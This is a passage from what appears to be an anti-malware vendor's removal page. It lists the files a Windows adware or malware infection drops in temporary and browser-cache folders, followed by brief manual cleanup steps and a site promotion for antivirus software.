    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\310714_is[1] (44832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe (20504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe (32816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe (32816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (3526 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe (44832 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe (64683 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].php (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe (33816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe (110758 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] (2696 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe (64392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (127551 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (26688 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\1[1].zip (229748 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (222 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\2[1].zip (325830 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\479.json (512 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (79 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (255743 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
    %WinDir%\Temp\CashReminder\mfs1A.tmp (408297 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\stores[1].htm (687 bytes)
    %WinDir%\Temp\P_StoreList.txt (687 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[1].txt (265 bytes)
    %WinDir%\Temp\G_CheckUpdate.txt (8 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[2].txt (16 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\update[1].htm (8 bytes)
    %WinDir%\Temp\G_RuleList.txt (16 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\rules[1].txt (94 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp (57 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\awhC.tmp (171 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\awhD.tmp (149648 bytes)
    

    4. 

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. 

  5. Reboot the computer.
    6. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now